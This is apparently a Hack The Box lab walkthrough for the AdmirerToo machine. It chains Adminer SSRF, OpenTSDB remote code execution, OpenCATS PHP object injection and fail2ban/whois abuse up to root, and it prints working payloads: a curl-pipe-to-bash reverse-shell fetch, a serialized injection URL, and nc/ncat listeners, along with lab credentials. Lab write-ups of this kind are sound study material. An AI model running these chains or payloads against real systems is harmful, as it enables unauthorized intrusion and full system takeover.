Hack_The_Box_Writeups

HackTheBox – AdmirerToo Walkthrough – In English

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nmap -A 10.10.11.137

http://10.10.11.137/

http://10.10.11.137/img/

But by observing the source code we can see the following mail webmaster@admirer-gallery.htb:

┌──(root㉿kali)-[/home/kali/Downloads]

└─# gobuster vhost -k -u http://admirer-gallery.htb -w subdomains-top1million-110000.txt -t 100 -o out

http://db.admirer-gallery.htb/

This is Adminer, Adminer is open-source database management in a single PHP file.

By observing the POST request of Enter we can see the following HTTP POST request:

We get this

auth%5Bdriver%5D=server&auth%5Bserver%5D=localhost&auth%5Busername%5D=admirer_ro&auth%5Bpassword%5D=1w4nn4b3adm1r3d2%21&auth%5Bdb%5D=admirer&auth%5Bpermanent%5D=1

We can see the password 1w4nn4b3adm1r3d2%21 which is 1w4nn4b3adm1r3d2!.

In Adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability, Users of Adminer versions bundling all drivers (e.g. adminer.php) are affected. This is fixed in version 4.7.9.

If we have SSRF we can try to access port 4242:

https://github.com/llhala/CVE-2021-21311

┌──(root㉿kali)-[/home/kali/Downloads/CVE-2021-21311]

└─# nc -lvnp 80

┌──(root㉿kali)-[/home/kali/Downloads/CVE-2021-21311]

└─# python3 CVE-2021-21311.py –host 10.10.14.102 –url http://db.admirer-gallery.htb –redirect http://10.10.11.137:4242

As we can see from the response – this is OpenTSDB.

According to https://security.snyk.io/vuln/SNYK-JAVA-NETOPENTSDB-1041751openTSDB vulnrable to RCE (CVE-2020-35476) by browsing to the following URL:

Let’s edit the script CVE-2021-21311.py and change the redirect URL to download our reverse shell and run it:

Modify the contentdef do_GET(self):        self.send_response(301)        self.send_header(‘Location’, “http://localhost:4242/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=[33:system(‘curl${IFS}http://10.10.14.102:8000/rev.sh|bash’)]&wxh=1516×644&style=linespoint&baba=lala&grid=t&json”) #self.redirect)        self.end_headers()

┌──(root㉿kali)-[/home/kali/Downloads/CVE-2021-21311]

└─# python3 CVE-2021-21311.py –host 10.10.14.102 –url http://db.admirer-gallery.htb –redirect http://10.10.11.137:4242

opentsdb@admirertoo:/$ ls /home

opentsdb@admirertoo:/$ cd /var/www/adminer

opentsdb@admirertoo:/var/www/adminer$ cat plugins/data/servers.php

Let’s use the password bQ3u7^AxzcB7qAsxE3 for the user jennifer:

┌──(root㉿kali)-[/home/kali/Downloads]

└─# ssh jennifer@10.10.11.137

jennifer@admirertoo:~$ cd /opt/opencats/

jennifer@admirertoo:/opt/opencats$ ls

jennifer@admirertoo:/opt/opencats$ cat config.php

jennifer@admirertoo:/opt/opencats$ mysql -u cats -padm1r3r0fc4ts -D cats_dev

MariaDB [cats_dev]> show tables;

MariaDB [cats_dev]> select user_name,password from user;

We are not able to crack those hashes using john and rockyou.txt but we can change the admin hash to our password test@123 which is ceb6c970658f31504a901b89dcd3e461 on MD5:

MariaDB [cats_dev]> update user set password=’ceb6c970658f31504a901b89dcd3e461′ where user_name=’admin’;

jennifer@admirertoo:/opt/opencats$ netstat –ant

Password: bQ3u7^AxzcB7qAsxE3

┌──(root㉿kali)-[/home/kali/Downloads]

└─# ssh -N -L 8889:127.0.0.1:8080 jennifer@10.10.11.137

By browsing to http://localhost:8889 we get:

http://localhost:8889/

We can see that is OpenCATS Version 0.9.5.2

By logging in using our credentials admin:test@123 we get:

OpenCATS is vulnerable to PHP Object injection, by leveraging this vulnerability, it is possible to conduct arbitrary file writing and execute arbitrary code on a system.

Following this OpenCATS PHP Object Injection to Arbitrary File Write we can see that we can write a file but we have no permissions to write file to openCATS directory.

We need to chain another exploit.

By enumerating again we can see that we have fail2ban installed:

jennifer@admirertoo:/opt/opencats$ cd vendor/

jennifer@admirertoo:/opt/opencats/vendor$ cat /etc/fail2ban/jail.local

So first let’s create a file called payload:}]|. [10.10.14.102]https://snoopysecurity.github.io/web-application-security/2021/01/16/09_opencats_php_object_injection.html we can write file with the following created payload: ┌──(root㉿kali)-[/home/kali/Downloads/phpggc] └─# ./phpggc -u –fast-destruct Guzzle/FW1 /usr/local/etc/whois.conf /home/kali/Downloads/payload

Now try to access this URL:

http://localhost:8889/index.php?m=activity&parametersactivity%3AActivityDataGrid=a%3A2%3A%7Bi%3A7%3BO%3A31%3A%22GuzzleHttp%5CCookie%5CFileCookieJar%22%3A4%3A%7Bs%3A36%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00cookies%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A27%3A%22GuzzleHttp%5CCookie%5CSetCookie%22%3A1%3A%7Bs%3A33%3A%22%00GuzzleHttp%5CCookie%5CSetCookie%00data%22%3Ba%3A3%3A%7Bs%3A7%3A%22Expires%22%3Bi%3A1%3Bs%3A7%3A%22Discard%22%3Bb%3A0%3Bs%3A5%3A%22Value%22%3Bs%3A20%3A%22%7D%5D%7C.+%5B10.10.14.102%5D%0A%22%3B%7D%7D%7Ds%3A39%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00strictMode%22%3BN%3Bs%3A41%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00filename%22%3Bs%3A25%3A%22%2Fusr%2Flocal%2Fetc%2Fwhois.conf%22%3Bs%3A52%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00storeSessionCookies%22%3Bb%3A1%3B%7Di%3A7%3Bi%3A7%3B%7D

And by sending it we can see the file whois.conf (whois.conf – alternative WHOIS servers list for whois client):

jennifer@admirertoo:/opt/opencats/vendor$ ls -ltr /usr/local/etc/

jennifer@admirertoo:/opt/opencats/vendor$ cat /usr/local/etc/whois.conf

┌──(root㉿kali)-[/home/kali/Downloads/phpggc]

└─# ncat -nvlkp 43 -c “cat revshell”

Now let’s run whois on the target machine and we can see it’s fetch the payload from our machine:

jennifer@admirertoo:/tmp$ whois 10.10.14.102

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nc -nlvp 4444

Now let’s try to connect using SSH and insert the wrong password to make fail2ban work:

root@admirertoo:/# cat /root/root.txt

Hi, I’m saksham dixit

Leave a Reply

Your email address will not be published. Required fields are marked *